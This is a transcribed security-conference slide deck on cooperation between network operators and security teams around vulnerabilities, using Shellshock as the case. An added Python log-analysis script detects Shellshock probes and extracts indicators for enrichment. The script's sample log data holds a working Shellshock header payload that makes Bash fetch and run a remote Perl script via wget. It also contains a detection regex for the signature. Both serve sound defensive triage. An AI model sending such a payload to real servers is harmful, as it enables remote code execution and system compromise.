APRICOT 2015 Security Day

Agenda
• Cooperation between N/W Operators and Security Teams
• Vulnerability Handling – Traditional questions
• Challenges and Gaps
• ShellShock example – Enrichment of OSINT
• Conclusion: Actionable intelligence

Dell - Internal Use - Confidential Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Traditional Cooperation Model/Cases Between N/W Operators and Security Teams
• Identify a stakeholder
  – Where does this hostile resource (IP/Domain) belong to?
  – Who is the attacker?
  – Overload or side work for N/W operations
• Vulnerability in N/W appliances
  – H/W and S/W
  – Management console (software)
• N/W protocol based vulnerability
  – POODLE (SSL v3)
• DDoS attack
  – NTP and DNS reflective amplification attacks

Traditional questions on a vulnerability
• Both for Security Teams and Network Operators – for all stakeholders
• Questions
  – What is the technical detail of the new vulnerability?
  – Does a technical mitigation / resolution exist?
    › Zero-day vulnerability
    › Mitigation plan
  – What and who is impacted?
    › Impacted products (Hardware / Software)
    › Scope of impact in the constituency
  – Is there a (successful) exploit / incident case?
    › Exploit activity
    › Malware or tools associated
  – Alternative mitigation plan?
    › Disable service
  – Actionable intelligence
• The CVSS (Common Vulnerability Scoring System) framework is widely adopted to address these questions.

Challenges and Gap
• Security Teams
  – Vendor dependent
  – Lack of information
    › Identify the stakeholder
  – Deliverables
    › Vulnerability advisory
    › Link to patches
    › Indicators
• Network Operators
  – Legal issues
    › Client information disclosure
  – Additional workload
  – Mitigation plan
    › Implementing patches on a production N/W
  – Lack of content for indicators
  – Perception of N/W availability

Change in Threat Landscape
• N/W providers' involvement in IT services increases
  – Outsourced N/W services, including security
  – Cloud computing (data centers)
• N/W admins are often targeted as an initial attack vector

What is ShellShock
• Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
• Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning.
Reference: http://en.wikipedia.org/wiki/Shellshock_(software_bug)

ShellShock example – Enrichment of OSINT
• OSINT
  – List of CVEs
  – List of CPEs
  – (Malicious indicators)
• Enrichment
  – Additional payload or malware
  – Association with a known threat group (TG)
  – Association with known malicious infrastructure
  – Passive DNS records
  – etc.
• Demonstration of a ShellShock investigation

Conclusion: Actionable intelligence
• Vulnerability advisories are not easy to digest or to act on
  – Mostly lack of content
  – Risk of blocking legitimate services
• Security Teams should start to provide more details
• N/W operators need to focus more on vulnerability mitigation at the N/W level, but should not forget about host based vulnerabilities
• Actionable intelligence promotes coordination and a better mitigation plan in a timely manner
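The ShellShock investigation and OSINT-enrichment slides describe the workflow but the deck carries no code for it. What follows is an added example, written for this page and not part of the original presentation or of any Dell SecureWorks tooling. It parses Apache combined-format access log lines, flags the Shellshock probe signature (a Bash function definition `() { ... };` injected into an HTTP header, the form used against CGI handlers once the first bug, CVE-2014-6271, was disclosed), and pulls out two kinds of indicators the enrichment slide calls for: the source IPs, and the hosts or IPs that the injected command reaches out to for payload download or callback, which are what you would feed into passive DNS and infrastructure lookups. The log lines, IP addresses (RFC 5737 documentation ranges) and hostnames are all constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample lines in Apache "combined" log format (example data, not real traffic).
# Lines 1 and 3 carry a Shellshock probe in the User-Agent / Referer header; line 2 is benign.
SAMPLE_LOG = [
    r'203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    r'"() { :;}; /bin/bash -c \"wget http://198.51.100.7/bot.pl -O /tmp/x; perl /tmp/x\""',
    r'198.51.100.23 - - [25/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" '
    r'"Mozilla/5.0 (X11; Linux x86_64)"',
    r'203.0.113.9 - - [25/Sep/2014:10:13:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 77 '
    r'"() { :; }; /bin/ping -c 1 scanner.example.net" "curl/7.37.0"',
]

# Combined log format. The quoted Referer / User-Agent fields may contain backslash-escaped quotes,
# which is exactly where an injected "bash -c \"...\"" shows up.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# Shellshock signature: an exported Bash function body "() { ... }" followed by ";" and the
# trailing command that vulnerable Bash versions executed when importing the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)')

# Indicator extractors applied to the injected command.
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
URL_HOST_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')
# Bare hostname tokens (e.g. a ping/nslookup target); the lookarounds keep URL path
# components such as "/bot.pl" from being mistaken for a domain.
BARE_HOST_RE = re.compile(r'(?<![\w/.])(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}(?![\w/.])')


@dataclass
class Finding:
    src_ip: str          # client address from the log line
    header: str          # which header carried the payload: "referer" or "ua"
    request: str         # request line, typically a /cgi-bin/ target
    command: str         # injected command after the "};" separator
    indicators: set = field(default_factory=set)  # hosts/IPs the command reaches out to


def extract_indicators(command: str) -> set:
    """Hosts and IPs referenced by the injected command (payload / callback infrastructure)."""
    found = set(URL_HOST_RE.findall(command))
    found.update(IPV4_RE.findall(command))
    found.update(BARE_HOST_RE.findall(command))
    return found


def detect(lines):
    """Scan combined-format access log lines and return one Finding per Shellshock probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess at field boundaries
        for header in ("referer", "ua"):
            hit = SHELLSHOCK_RE.search(m.group(header))
            if hit:
                # Undo the log's backslash-escaping so the command reads as the attacker wrote it.
                command = hit.group("cmd").replace('\\"', '"').strip()
                findings.append(Finding(m.group("ip"), header, m.group("request"),
                                        command, extract_indicators(command)))
    return findings


def enrichment_set(findings):
    """Indicators to hand to OSINT / passive DNS / infrastructure enrichment."""
    return {
        "sources": {f.src_ip for f in findings},
        "payload_hosts": set().union(*(f.indicators for f in findings)),
    }


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"{f.src_ip} via {f.header} on {f.request!r}: {f.command!r} -> {sorted(f.indicators)}")
    print(enrichment_set(hits))
```

Run stand-alone, the script reports two probes: one from 203.0.113.5 whose payload is fetched from 198.51.100.7, and one from 203.0.113.9 that pings scanner.example.net. The source addresses answer the "where does this hostile resource belong to" question for the N/W operator, and the payload hosts are the seeds for passive DNS and threat-group association. The `() {` signature is cheap enough to turn into a blocking rule at the network edge, which is how many operators responded in 2014, but as the conclusion slide warns, validate such a rule against production traffic before deploying it; this example is written for triage and enrichment, not as a drop-in block list.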